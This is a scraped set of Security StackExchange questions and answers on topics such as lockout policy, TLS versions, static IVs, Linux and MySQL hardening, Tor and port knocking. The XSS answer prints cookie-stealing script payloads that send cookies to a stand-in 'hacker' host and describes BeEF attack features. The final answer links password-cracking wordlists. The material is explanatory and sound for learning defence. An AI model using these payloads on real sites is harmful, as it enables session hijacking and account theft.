"https://security.stackexchange.com",
"https://security.stackexchange.com/users/157/"
]
} |
487 | I know the reasoning behind not letting infinite password attempts - brute force attempts is not a meatspace weakness, but a problem with computer security - but where did they get the number three from? Isn't denial of service a concern when implementing a lockout policy that is easily activated? Is there any hard research showing an optimal number or range to choose before locking out an account that balances actual security threat with usability? Thinking it through, I don't see any measurable security difference between three attempts and 20 attempts with the password complexity generally in use today. (I know this skirts subjectivity, but I'm looking for measurement based opinions) | Recently, at the OWASP AppSec 2010 conference in Orange County, Bill Cheswick from AT&T talked at length about this issue. In brief, there's insufficient research. In long, here are some of his ideas for less painful account locking: Don't count duplicate password attempts (they probably thought they mistyped it) Make the password hint about the primary password, and don't have a (weak) secondary Allow a trusted party to vouch for the user, so he can change his password. Lock the account in increasing time increments Remind the user of password rules. | {
"source": [
"https://security.stackexchange.com/questions/487",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/217/"
]
} |
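One of the ideas listed above -- locking the account in increasing time increments instead of a hard three-strikes lockout -- can be sketched in a few lines of Python. The thresholds, delays and the in-memory store are arbitrary illustrative choices; a real implementation would persist this state and, as also suggested above, avoid counting duplicate attempts of the same wrong password.

```python
import time

failures = {}   # username -> (consecutive_failures, locked_until_timestamp)

def is_locked(user: str) -> bool:
    _, locked_until = failures.get(user, (0, 0.0))
    return time.time() < locked_until

def record_failure(user: str) -> None:
    count, _ = failures.get(user, (0, 0.0))
    count += 1
    # no delay for the first few attempts, then 30s, 60s, 120s, ... doubling each time
    delay = 0 if count < 3 else 30 * 2 ** (count - 3)
    failures[user] = (count, time.time() + delay)

def record_success(user: str) -> None:
    failures.pop(user, None)
```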
503 | As a web designer (not a security expert) I wonder: If I allow users to upload content to my website (videos, images and text files), what are the real risks involved? | There are a couple of risks from allowing content to be uploaded onto your site, but how important they are to you will likely depend on exactly how the site you're designing will work. First up is malware upload. If an attacker can upload malware onto your site and that malware is downloaded and executed by your users then that's likely to be a problem. Preventing this usually relies on a combination of restricting the types of file that can be uploaded (one point to note is that you shouldn't just rely on file extension here), and using malware scanning on uploaded content. Of course the scanning side of things will only stop known signatures, and can be bypassed fairly easily. A second potential problem is if they can upload active content and have that executed by your application. So for example if your site uses php, then if they can upload a php script and then get it to run as part of your application then they are likely to be able to take control of the server, or at least access other information that exists in the app. One approach I've seen to addressing this is to ensure that the uploaded files are not placed in the web root and ensuring that the web server will not execute files from that location. A third risk is users uploading "illegal" material. This can be a tricky legal question to sort, but if you allow user-generated content you're likely to have to deal with it sooner or later. The fix for this seems to be primarily procedural. Have a good relationship with your hosting company and ISP and ensure that you can respond to requests to have content removed quickly, if you're hosting in a jurisdiction that requires content to be taken down if a request comes in (e.g., a DMCA request). | {
"source": [
"https://security.stackexchange.com/questions/503",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/218/"
]
} |
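A hedged Python sketch of the first two mitigations above: check the file's magic bytes instead of trusting the client-supplied extension, cap the size, and write the file under a server-chosen random name outside the web root. The allowed types, paths and size limit are illustrative assumptions, and none of this replaces malware scanning or correct web-server configuration.

```python
import os
import secrets

ALLOWED = {
    b"\xff\xd8\xff": ".jpg",         # JPEG magic bytes
    b"\x89PNG\r\n\x1a\n": ".png",    # PNG magic bytes
}
UPLOAD_DIR = "/srv/uploads"          # outside the web root, never executed as code
MAX_BYTES = 10 * 1024 * 1024

def store_upload(data: bytes) -> str:
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    ext = next((e for magic, e in ALLOWED.items() if data.startswith(magic)), None)
    if ext is None:
        raise ValueError("file type not allowed")
    # random server-chosen name: the original filename is never trusted or reused
    name = secrets.token_hex(16) + ext
    with open(os.path.join(UPLOAD_DIR, name), "wb") as f:
        f.write(data)
    return name
```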
622 | Might as well bring this hot topic here! For those not in the know: https://www.pcisecuritystandards.org/ | A good question, but perhaps you should phrase it "Does PCI harm security". To answer both questions, I would differentiate very roughly between two types of organizations (even though most fall in between these two extremes): Security-conscious organizations, that routinely perform business-risk based analysis, have a comprehensive SDL in place, perform all the right moves, etc. Security-unconscious organizations, that have no interest in anything they are not absolutely forced to do, and especially not if it doesn't make any money. For the second group, PCI absolutely helps, a lot, in the following ways: Awareness (now someone is at least allowed to mention security, and hopefully they're all talking about it) Budget - since otherwise management would never have allocated any resources whatsoever to invest in any form of security, now they are at least forced to pay lip-service. Minimal baseline of least common denominator activities. (Hopefully this includes training the developers, which helps more than any regulation...) Basically it forces them to acknowledge security, and hopefully some additional good will come out of it. For the first group, there are two (two and a half) main consequences: There are (rare) situations where the organization has to choose between a real security solution, and compliance with the generic baseline LCD. Budget is now forcefully allocated to the minimal, generic baseline LCD as defined by some external group that knows nothing about their business. (This budget would probably be more useful in different security activities / products / etc). Management is quicker to pass on any security investment that is not mandated directly by the PCI - "if they don't need it / if it's good enough for them without, why should we bother?" or "If it was important, PCI would have required it". In this case, PCI is doing more harm than good, since getting them to build in security is not an issue for these orgs. However, one benefit of PCI compliance that is shared across the board: PCI compliance reduces the risk of the penalties of non-compliance. | {
"source": [
"https://security.stackexchange.com/questions/622",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/22/"
]
} |
643 | I've heard it said that PHP is inherently insecure. Is this true? Why? | It is pretty hard for a language to be "inherently insecure" by my definition, since a good programmer can adapt. But PHP started out leaving a lot of minefields lying around for novices. The initial versions of PHP paid little attention to security and the design had some big flaws. Security is hard to retrofit into the core software and into the libraries. Security training is hard in the best of circumstances, and even more so when a large subset of the developers are inexperienced and started off with bad defaults. For example, it wasn't until version 4.2.0 that register_globals was disabled by default, so data received over the network was not inserted directly into the global namespace anymore. This feature is finally slated for complete removal in the next version. The early release of PHP and the ease of deploying simple PHP applications also attracted many developers with little security awareness, and ensured a large number of applications, a significant number of which had remotely exploitable vulnerabilities. The size and vulnerability of the deployed base also attracted a lot of interest from the exploit community. Here are some references and useful links PHP Insecurity - Technology Review How secure is PHP? - Stack Overflow References on "inherently insecure": http://www.sitepoint.com/forums/showthread.php?threadid=112694 PHP Security Consortium http://en.wikipedia.org/wiki/PHP#Security | {
"source": [
"https://security.stackexchange.com/questions/643",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/160/"
]
} |
705 | Please correct me if I'm wrong, but my understanding is that SSLv3 and TLSv1 is just a rename of the earlier protocol... but TLSv1 adds the ability to have secured and unsecured traffic on the same port. What are the differences and benefits of all the newer specs of TLS? | I like this blog entry by yaSSL describing the differences: http://www.yassl.com/yaSSL/Blog/Entries/2010/10/7_Differences_between_SSL_and_TLS_Protocol_Versions.html I copied the key snippets from the blog to here: "SSL 3.0 [..] Some major improvements of SSL 3.0 over SSL 2.0 are: Separation of the transport of data from the message layer Use of a full 128 bits of keying material even when using the Export cipher Ability of the client and server to send chains of certificates, thus allowing organizations to use certificate hierarchy which is more than two certificates deep. Implementing a generalized key exchange protocol, allowing Diffie-Hellman and Fortezza key exchanges as well as non-RSA certificates. Allowing for record compression and decompression Ability to fall back to SSL 2.0 when a 2.0 client is encountered
TLS 1.0 [..] This was an upgrade from SSL 3.0 and the differences were not dramatic, but they are significant enough that SSL 3.0 and TLS 1.0 don't interoperate. Some of the major differences between SSL 3.0 and TLS 1.0 are: Key derivation functions are different MACs are different - SSL 3.0 uses a modification of an early HMAC while TLS 1.0 uses HMAC. The Finished messages are different TLS has more alerts TLS requires DSS/DH support
TLS 1.1 [..] is an update to TLS 1.0. The major changes are: The Implicit Initialization Vector (IV) is replaced with an explicit IV to protect against Cipher block chaining (CBC) attacks. Handling of padded errors is changed to use the bad_record_mac alert rather than the decryption_failed alert to protect against CBC attacks. IANA registries are defined for protocol parameters Premature closes no longer cause a session to be non-resumable.
TLS 1.2 [..] Based on TLS 1.1, TLS 1.2 contains improved flexibility. The major differences include: The MD5/SHA-1 combination in the pseudorandom function (PRF) was replaced with cipher-suite-specified PRFs. The MD5/SHA-1 combination in the digitally-signed element was replaced with a single hash. Signed elements include a field explicitly specifying the hash algorithm used. There was substantial cleanup to the client's and server's ability to specify which hash and signature algorithms they will accept. Addition of support for authenticated encryption with additional data modes. TLS Extensions definition and AES Cipher Suites were merged in. Tighter checking of EncryptedPreMasterSecret version numbers. Many of the requirements were tightened Verify_data length depends on the cipher suite Description of Bleichenbacher/Dlima attack defenses cleaned up. | {
"source": [
"https://security.stackexchange.com/questions/705",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
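Not part of the quoted comparison, but a practical aside: a client can simply refuse the older protocol versions. A minimal sketch with Python's standard ssl module (requires Python 3.7+; the host name is a placeholder):

```python
import socket
import ssl

ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # refuse SSL 3.0, TLS 1.0 and TLS 1.1

with socket.create_connection(("example.com", 443)) as sock:
    with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.version())                   # e.g. 'TLSv1.2' or 'TLSv1.3'
```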
755 | How does basic HTTP Auth work? | The server sends back a header stating it requires authentication for a given realm. The user provides the username and password, which the browser concatenates (username + ":" + password), and base64 encodes. This encoded string is then sent using an "Authorization" header on each request from the browser.
Because the credentials are only encoded, not encrypted, this is highly insecure unless it is sent over https. | {
"source": [
"https://security.stackexchange.com/questions/755",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/160/"
]
} |
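The encoding step described above is trivial to reproduce and just as trivial to reverse, which is exactly the point of the warning. A small Python sketch with made-up credentials:

```python
import base64

user, password = "alice", "s3cret"              # hypothetical credentials
token = base64.b64encode(f"{user}:{password}".encode()).decode()

print(f"Authorization: Basic {token}")          # Authorization: Basic YWxpY2U6czNjcmV0
print(base64.b64decode(token).decode())         # alice:s3cret -- recovered instantly
```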
890 | I see a lot of sites use GUIDs for password resets, unsubscribe requests and other forms of unique identification. Presumably they are appealing because they are easy to generate, unique, non-sequential and seem random. But are they safe enough for these purposes? It seems to me that given a GUID, predicting subsequent GUIDs may be possible since (as far as I know) they're not intended to be cryptographically secure...or are they? Note: I'm not talking about sites that use a random blob of gobbledygook encoded in base64. I'm talking about sites like this that appear to be using a raw guid: http://example.com/forgotPassword/?id=b4684ce3-ca5b-477f-8f4d-e05884a83d3c | Are they safe enough for the purposes you described? In my opinion, generally yes. Are they safe enough in applications where security is a significant concern? No. They're generated using a non-random algorithm, so they are not in any way cryptographically random or secure. So for an unsubscribe or subscription verification function, I really don't see a security issue. To identify a user of an online banking application on the other hand, (or really probably even a password reset function of a site where identity is valuable) GUIDs are definitely inadequate. For more information, you might want to check out section 6 (Security Considerations) of the RFC 4122 for GUIDs (or Universally Unique Identifiers). | {
"source": [
"https://security.stackexchange.com/questions/890",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/545/"
]
} |
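If the goal is a reset-link token rather than an identifier, Python makes the distinction easy to act on: uuid4 produces a GUID, while the secrets module is explicitly documented for security-sensitive tokens. A small illustrative sketch; note that the UUID specification itself does not require a cryptographically strong generator, even though many implementations use one.

```python
import secrets
import uuid

reset_id_guid = str(uuid.uuid4())           # a random-looking version-4 GUID
reset_id_token = secrets.token_urlsafe(32)  # 32 bytes (256 bits) from a CSPRNG

print(reset_id_guid)    # e.g. b4684ce3-ca5b-477f-8f4d-e05884a83d3c
print(reset_id_token)   # e.g. a 43-character URL-safe string
```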
894 | I've seen websites placing HTTPS iframes on HTTP pages. Are there any security concerns with this? Is it secure to transmit private information like credit card details in such a scheme (where the information is only placed on the HTTPS iframe form, and not on the HTTP parent page)? | If only the iframe is https, the user cannot trivially see the URL it points to. Therefore, the source http page could be altered to point the iframe anywhere it wanted to. That's pretty much a game-over vulnerability that eliminates the advantages of https. | {
"source": [
"https://security.stackexchange.com/questions/894",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/181/"
]
} |
988 | I'm making a REST API and it's straightforward to do BASIC auth login. Then let HTTPS secure the connection so the password is protected when the API is used. Can this be considered secure? | There are a few issues with HTTP Basic Auth: The password is sent over the wire in base64 encoding (which can be easily converted to plaintext). The password is sent repeatedly, for each request. (Larger attack window) The password is cached by the web browser, at a minimum for the length of the window / process. (Can be silently reused by any other request to the server, e.g. CSRF). The password may be stored permanently in the browser, if the user requests. (Same as previous point, in addition might be stolen by another user on a shared machine). Of those, using SSL only solves the first. And even with that, SSL only protects until the webserver - any internal routing, server logging, etc., will see the plaintext password. So, as with anything it's important to look at the whole picture. Does HTTPS protect the password in transit? Yes. Is that enough? Usually, no. (I want to say, always no - but it really depends on what your site is and how secure it needs to be.) | {
"source": [
"https://security.stackexchange.com/questions/988",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/200/"
]
} |
993 | We have already had questions on here about Hardening Apache, Hardening PHP and Securing SSH. To continue this trend I am interested in what steps people take to harden Linux servers. As in what steps do people always take when setting up a new server, that are not application specific. Such as setting the tmp partition to be noexec, uninstalling / disabling certain services, etc. | Identify the required applications and processes, and apply a checklist to avoid installing anything else -- or, worst case, uninstall it after the initial build. Here I'm thinking of those common culprits which still seem to go on to far too many distros by default! NFS services: nfsd, lockd, mountd, statd, portmapper telnet server and ftp server R services: rlogin, rsh, rcp, rexec BIND and DNS server unless needed mail servers such as sendmail X11 (unless desktop needed) finger daemon etc The next step up is to go through the potentially weak services and limit access to them use at.allow and cron.allow to restrict access to crontab Ensure all devices are unreadable and unwriteable by ordinary users (excluding those such as /dev/tty and /dev/null etc) Key files - these should be owned by root, with tight permissions: /etc/fstab, /etc/passwd, /etc/shadow Carefully check hosts.equiv - a great source of access here :-) Similarly, NFS config is locked down if it is required Disable unneeded system accounts. Look at filesystem - sticky bits for all executables and public directories. Check all root requirements (PATH environment variable, no remote access as root, group membership, password requirements) Check all user requirements (membership in privileged groups, valid shells, umask, SUID, SGID requirements) and of course the SANS guide is a really good source! | {
"source": [
"https://security.stackexchange.com/questions/993",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57/"
]
} |
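A rough Python spot-check in the spirit of the "key files" items above; the file list and the expected modes are assumptions to adapt to your own baseline (some distros use different shadow permissions, for example):

import os, stat, pwd

BASELINE = {
    "/etc/passwd": 0o644,
    "/etc/shadow": 0o640,   # 0o600 on some distros
    "/etc/fstab":  0o644,
}

for path, max_mode in BASELINE.items():
    st = os.stat(path)
    mode = stat.S_IMODE(st.st_mode)
    owner = pwd.getpwuid(st.st_uid).pw_name
    issues = []
    if owner != "root":
        issues.append("owner is %s, expected root" % owner)
    if mode & ~max_mode:
        issues.append("mode %o is wider than %o" % (mode, max_mode))
    print(path, "OK" if not issues else "; ".join(issues))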
1,057 | How much can I depend on Tor for anonymity? Is it completely secure? My usage is limited to accessing Twitter and Wordpress. I am a political activist from India and I do not enjoy the freedom of press like the Western countries do. In the event my identity is compromised, the outcome can be fatal. | Tor is better for you than it is for people in countries whose intelligence services run lots of Tor exit nodes and sniff the traffic. However, all you should assume when using Tor is that, if someone's not doing heavy statistical traffic analysis, they can't directly correlate your IP with the IP requesting resources at the server. That leaves many, many methods of compromising your identity still open. For instance, if you check your normal email while using Tor, the bad guys can know that that address is correlated with other Tor activity. If, as @Geek said, your computer is infected with malware, that malware can broadcast your identity outside the Tor tunnel. If you even hit a webpage with an XSS or CSRF flaw, any other web services you're logged into could have their credentials stolen. Bottom line, Tor is better than nothing; but if your life is on the line, use a well-secured computer for accessing Twitter and WordPress using it, and don't use that computer for anything else. | {
"source": [
"https://security.stackexchange.com/questions/1057",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/636/"
]
} |
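One habit that follows from the caveats above is verifying that traffic really leaves through Tor before doing anything sensitive. A sketch, assuming a local Tor client listening on its default SOCKS port (9050) and the requests[socks] extra installed:

import requests

# socks5h also routes DNS lookups through the proxy.
proxies = {"http": "socks5h://127.0.0.1:9050",
           "https": "socks5h://127.0.0.1:9050"}
# check.torproject.org reports whether the request arrived via a Tor exit.
page = requests.get("https://check.torproject.org/", proxies=proxies, timeout=60).text
print("via Tor" if "Congratulations" in page else "NOT via Tor")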
1,093 | We've had to extend our website to communicate user credentials to a suppliers website (in the query string) using AES with a 256-bit key, however they are using a static IV when decrypting the information. I've advised that the IV should not be static and that it is not in our standards to do that, but if they change it their end we would incur the [big] costs so we have agreed to accept this as a security risk and use the same IV (much to my extreme frustration). What I wanted to know is, how much of a security threat is this? I need to be able to communicate this effectively to management so that they know exactly what they are agreeing to. We are also using the same KEY throughout as well. Thanks | It depends on the chaining mode. AES is a block cipher, it is applied on blocks of 16 bytes (exactly). The chaining mode defines how input data becomes several such blocks, and how output blocks are then put together. Most chaining modes need to work with some sort of "start value", which is not secret but should change for every message: that is the IV. Reusing the same IV is deadly if you use the CTR chaining mode. In CTR mode, AES is used on a sequence of successive counter values (beginning with the IV), and the resulting sequence of encrypted blocks is combined (by bitwise XOR) with the data to encrypt (or decrypt). If you use the same IV then you get the same sequence, which is the infamous "two-time pad". Basically, by XORing two encrypted string together, you get the XOR of the two cleartext data. This opens to an awful lot of attacks, and basically the whole thing is broken. Things are less dire if you use CBC. In CBC, the data itself is broken into 16-byte blocks. When a block is to be encrypted, it is first XORed with the previous encrypted block. The IV has the role of the "-1" block (the previous encrypted block for the first block). The main consequence of reusing the IV is that if two messages begin with the same sequence of bytes then the encrypted messages will also be identical for a few blocks. This leaks data and opens the possibility of some attacks. To sum up, do not do that. Using the same IV with the same key ever and ever defeats the whole purpose of the IV, the reason why a chaining mode with IV was used in the first place. | {
"source": [
"https://security.stackexchange.com/questions/1093",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/653/"
]
} |
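A short demonstration of the CTR-mode failure described above, using a recent version of the Python cryptography package; the key, nonce and card numbers (standard test numbers) are made up for illustration:

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key   = os.urandom(32)      # AES-256 key
nonce = os.urandom(16)      # the "IV" that is wrongly reused below

def ctr_encrypt(plaintext):
    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    return enc.update(plaintext) + enc.finalize()

c1 = ctr_encrypt(b"user=alice;card=4111111111111111")
c2 = ctr_encrypt(b"user=bob;  card=5500005555555559")

# With a reused key+IV in CTR mode the keystream cancels out: XOR of the two
# ciphertexts equals XOR of the two plaintexts, with no key required at all.
print(bytes(a ^ b for a, b in zip(c1, c2)))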
1,138 | Following the hardening theme.... What are some best practices, recommendations, and required reading for securing MySQL? | Run only MySQL on the Server - If possible run only MySQL on the server and remove any unused services. Firewall - Limit access by IP address to only the servers / clients that require access. User Privileges - When creating users always give the minimum amount of privileges and expand as needed. Also try to avoid using the '%' wildcard for hosts and instead limit to the host that requires access. Bind Address Appropriately - If you only require remote access from within the same network and the machine has both an external IP and an internal network address, set up MySQL to listen only on the internal address. Enable Logging - Enable logging if the database doesn't handle too many queries (on a busy server the logging overhead and volume can become prohibitive). mysql_secure_installation - Use the mysql_secure_installation utility, which does a number of things including removing anonymous-user accounts, removing the test database, etc. Root Account Accessible Locally Only - It's best to limit the root account to be accessible only directly from the machine. The mysql_secure_installation utility does allow you to remove any remote access for root accounts easily. I usually then either ssh to the machine and use the mysql command prompt, or use MySQL Workbench's functionality to tunnel over SSH. Additional Resources: MySQL Security Best Practices (Hardening MySQL Tips), MySQL Best Practices: User Security, Security in MySQL | {
"source": [
"https://security.stackexchange.com/questions/1138",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/618/"
]
} |
1,167 | I would like to use HTTPS to log in to my personal webpage (which is on shared hosting). So I went over to Google and started searching for solutions. Eventually I found out that I need an SSL certificate to accomplish that (I thought it was something automatically enabled for each website, don't ask me why). Then I went over to my hosting provider's website and found out about the prices of these certificates... But I don't need something like that for my blog... I also found out that certificates can be self-signed, or obtained for free from certain certificate authorities. What I'm wondering is - how should I approach this? Since I'm the only one that's logging in there - should I generate my own certificate? Or get a free one from some CA? If yes - which CA? CAcert maybe? Will it all stay transparent this way, or will I start getting warnings about a custom, unverified certificate? Can I trust a solution like this? Does it even make sense to try and do something like this if I'm using shared hosting? I mean, from what I've read - this certificate would have to be installed on the server, and not just put somewhere in my hosting folder (as I thought it would work)... and the hosting provider won't do this for free, I guess, because it's kinda not in their interest (in any case I asked them, and am waiting for a reply)... Should I just drop it, or is there anything I can do on my own? | I like using StartCom for a free certificate. Until mid-2016, it was recognized by most major browsers and was better than using a self-signed certificate (no error prompts for users). EDIT 2016: Major browser vendors like Mozilla, Apple, and Google have announced they (and their browsers) no longer trust StartCom as a certificate authority, due to recently uncovered sketchy behavior by the certificate authority (see the links in the vendors' names for their announcements and the reasons why). Edit 2017: Let's Encrypt is now a great option for personal use and seems to be accepted even more widely than StartSSL was. Downsides to Let's Encrypt are the relatively short validity of the certificate (3 months), but that is not overly burdensome if you are able to take advantage of the automatic renewal they offer through some of their tooling. | {
"source": [
"https://security.stackexchange.com/questions/1167",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/23/"
]
} |
1,194 | Normally for a server I like to lock down SSH and other non-public services so that they are only accessible from certain IP addresses. However this is not always practical if the business doesn't have static IP addresses or if outside developers need access. I heard about port knocking a while ago and have finally had a chance to look into it as a solution to the above problem. As a result of this I have a load of questions I hope people can help me out with. Has anyone deployed it within their business / organisation and can offer any advice? What is the best knocking daemon to run under Linux? What are the best clients for Linux, Windows and OS X? What is the recommended length for a knock sequence, and is it best to use TCP, UDP or both? What are the associated downsides and issues with using it? Is it just security through obscurity? Are there any alternatives to the port knocking
approach? | While I have not deployed it yet, I know many people who have deployed it. Every single one of them have noted a significant reduction in the amount of bandwidth consumed by things like SSH brute-force attacks as a result. However, that is not to say that there are not downsides. AFAIK, there are no kernel-based port knocking implementations available, which for me would be the real key to adoption. Port knocking daemons rely on reading failed (and filtered/prohibited) log file entries from a firewall system. That's all fine and dandy, but what happens if the filesystem gets full? What happens when the daemon gets killed because of some runaway process eating up the system's RAM and swap? What happens if something else which either of those two things depend on just up and stop working? You most likely end up with a server that you will have to physically access. That could wind up being more costly than is reasonable, especially if you are more than a few tens of miles away from the server and do not have anyone that you can call to get there in a hurry. One thing that I can say is that it is not "security through obscurity". Port knocking is a form of authentication, and like any authentication system it can be made to be as simple or complex as desired. Something as simple as "knock on port 10,000 + realPortNumber" can be done, which would amount to a trivial break, or the port knocking might itself be used to transmit some form of real authentication (say, 1 block of AES encoded data given a key derived by some other method). It would not be feasible to use port knocking to transmit large amounts of data, though, because it would take significantly longer than just sending a single packet, and if the packet is over TCP than at least it can be known if it was received successfully or encountered some form of error. One interesting question that this brings up, however, is how to manage the log files---userland implementations mostly require the log files in order to determine whether or not a knock has been successfully sent, and what happens if those logs are leaked? Authentication data becomes known, and that is obviously not a very good thing. I cannot tell you whether or not to use port knocking in your setup. I am not yet, and I am not 100% certain that I ever will be. It makes more sense to me to use strong authentication systems that are based on strong cryptography (such as a PKI infrastructure) than it does to throw port knocking in the way. Also, adding a single point of failure to access critical infrastructure, to me anyway, seems like a bad idea, and way more difficult to properly support with any sort of guarantee. Again, though, that is based on the notion of the port-knocking software being not integrated with the firewall at the operating system kernel level; if that ever changes, I may also change how I feel about using it. | {
"source": [
"https://security.stackexchange.com/questions/1194",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57/"
]
} |
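For reference, the client side of a knock is tiny, which is part of why the scheme is tempting; a hypothetical Python knock client where the host, sequence and timeout are placeholders to match whatever the knock daemon expects:

import socket

HOST = "203.0.113.10"
SEQUENCE = [7000, 8000, 9000]

for port in SEQUENCE:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(0.5)
    try:
        s.connect((HOST, port))   # expected to fail; the attempt itself is the knock
    except OSError:
        pass
    finally:
        s.close()

# After the sequence the firewall should (briefly) open the real port, e.g.:
#   ssh user@203.0.113.10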
1,300 | I'm developing an application for Android/Java. The application is a kind of password manager, so I'm storing encrypted passwords under the hood of a master password. There are a number of encryption algorithms: DES/AES/Blowfish/Twofish and so on. My intention is to develop an application which is free of commercial copyright issues. So the question is: if I use the built-in Java encryption APIs (e.g. DES/AES), does that mean I will be free from possible commercial interests of
DES/AES alike copyright holders? Any other thoughts, meanings will be helpful also. | There is no copyright on algorithms . Algorithms are like ideas; the kind of intellectual property which applies to them is patents, not copyrights. There are some cryptographic algorithms which are patented, but most are not and some used to be patented (but patents ultimately expire). Neither DES, AES, Blowfish or Twofish is patented. An example of patented symmetric encryption system is IDEA (US patent will expire in 2012). The RSA algorithm (asymmetric encryption and digital signatures) was patented, but the patent expired ten years ago. Basically, if a cryptographic algorithm is made available through an already installed Java VM, then it probably is not patented (anymore, or at all). There can be copyrights on implementations . Using an implementation which is already there is not impacted by the copyright (it is a copyright, not a useright). You have to worry about copyright when you include external code into your application, not when you use external code provided by the installed Java VM through its published API. Software systems can further be controlled by licenses . One could imagine a specific license which prohibits using some of the software depending on usage context or just any arbitrary condition. One could imagine such a software license on the implementation of a cryptographic algorithm. This would be the problem of whoever uses your software, not your problem. The Java VM license is the one which applies here. But, as far as I know, there is no usage restriction on the Java VM components, be they cryptographic or not. The VM vendor usually does not wish to restrict usage of his API. Local laws may apply, especially on the matter of encryption. Depending on the country, laws may limit usage, distribution, export and/or import of software using cryptographic algorithms. The Java VM (at least, the one from Sun/Oracle) includes a relatively complex system of permissions and security rules which determines which algorithms are available, and with which key lengths. Thus, it can be assumed that whatever algorithm is made available to applications by the VM has already been tuned with regards to key lengths in order to comply with local laws. There can always be exceptions in some situations (if you are a North-Korean agent hard at work building a nuclear bomb somewhere in South Dakota, then using cryptographic algorithms, even if legally provided by the installed Java VM, might imply a few extra years of jail when the FBI gets you). In practical terms, you should check the export laws of your country if you distribute software which provides some kind of encryption service, notably if you put it on a Web site. Summary: there is no intellectual property related worry to have about using cryptographic algorithms provided by the Java VM. You should make some inquiries about regulations on cryptographic software distribution and export. You can begin by the Wikipedia pages on crypto export and import . | {
"source": [
"https://security.stackexchange.com/questions/1300",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/814/"
]
} |
1,368 | I have very little experience in web development, but I'm interested in security. However, I haven't fully understood how XSS works. Can you explain it to med? The Wikipedia article give me a good idea but I don't think I understand it very well. | XSS - Cross Site Scripting (but not limited to actual cross site scripting) XSS is usually presented in 3 different ways: Non-persistent (often called reflected XSS) This is when you are able to inject code and the server returns it back to you, unsanitized. Often this can be exploited by distributing an (usually innocent looking) URL in some form or way for others to click on. This can be particular effective when you're dealing with focused attacks against someone. As long as you can make someone click the URL you sent there is a chance you can gain elevated privileges on the system. Example: A site containing a search field does not have the proper input sanitizing. By crafting a search query looking something like this: "><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT> Sitting on the other end, at the webserver, you will be receiving hits where after a double space is the users cookie. You might strike lucky if an administrator clicks the link, allowing you to steal their sessionID and hijack the session. Using techniques like spam email, message board posts, IM messages, Social Engineering Toolkits this vulnerability can be very dangerous. DOM-based Very similar to non-persistent, but where the javascript payload does not have to be echoed back from the webserver. This can often be where simply the value from an URL parameter is echoed back onto the page on the fly when loading using already resident javascript. Example: http://victim/displayHelp.php?title=FAQ#<script>alert(document.cookie)</script> Of course criminals would modify the URL to make it more innocent looking. The same payload as above just encoded differently: http://victim/displayHelp.php?title=FAQ#<scri
&#112;t>alert(document.cookie)</sc
ript> You can even mask it better when sending to email clients that support HTML like this: <a href="http://victim/displayHelp.php?title=FAQ#<script>alert(document.cookie)
</script>">http://victim/displayHelp.php?title=FAQ</a> Persistent Once you are able to persist an XSS vector the attack becomes much more dangerous very fast. A persistent XSS is reflected back to you from the server, usually because the XSS has been stored in a database field or similar. Consider the following input is stored to database and then presented back to you on your profile: <input type="text" value="Your name" /> If you are able to make the application accept and store unsanitized input, all you have to do is make other users view your profile (or where the XSS is reflected back). These kinds of XSS can be not only hard to spot, but very devastating to the system. Just take a look at the XSS worm called Samy worm ! In the early days of XSS you saw this kind of exploit all over guestbooks, communities, user reviews, chat rooms and so on. Two attack vectors Now that you know the different ways of delivering a XSS payload I'd like to mention a few XSS attack vectors that can be very dangerous: XSS defacement XSS defacement is not a hard feat to accomplish. If the XSS is persistent as well, it can be a hassle for the sysadmins to figure it out. Take a look at RSnake Stallowned "attack" which took out Amazon's book preview feature. Quite funny reading. Cookie stealing and session hijacking As in one of the examples above, once you can access users' cookies you can also grab sensitive information. Capturing sessionID's can lead to session hijacking, which in turn can lead to elevated privileges on the system. Sorry about the long post. I'll stop now. As you can see though, XSS is a very big topic to cover. I hope I made it a bit clearer for you, though. Exploiting XSS with BeEF To easy see how XSS can be exploited I recommend trying out BeEF , Browser Exploitation Framework. Once it's unpacked and run on a webserver with PHP support, you can easily try spawning a simulation of a victim (called a zombie) where you can very easy try out different XSS payloads. To mention some: Portscan local network Pingsweep local network Send virus infected applet, signed and ready Send messages to client Make a Skype call The list goes on. Recommend seeing the video on the BeEF homepage. UPDATE: I've done a write up on XSS on my blog which describes XSS. It contains a bit about the history of XSS, the different attack types and some use-cases including BeEF and Shank. | {
"source": [
"https://security.stackexchange.com/questions/1368",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/213/"
]
} |
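For completeness, the "http://hacker/" collection endpoint in the reflected-XSS example above can be just a few lines; this hypothetical stand-in logs whatever the injected script appends to the URL (useful only when testing your own applications):

from http.server import BaseHTTPRequestHandler, HTTPServer

class Catcher(BaseHTTPRequestHandler):
    def do_GET(self):
        print("received:", self.path)      # e.g. /?c=SESSIONID=abc123
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8000), Catcher).serve_forever()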
1,376 | I’m wondering where I can find good collections of dictionaries which can be used for dictionary attacks? I've found some through Google, but I’m interested in hearing about where you get your dictionaries from. | Nice list collected by Ron Bowes you can find here: https://wiki.skullsecurity.org/index.php/Passwords Other list is from InsidePro: https://web.archive.org/web/20120207113205/http://www.insidepro.com/eng/download.shtml . | {
"source": [
"https://security.stackexchange.com/questions/1376",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/294/"
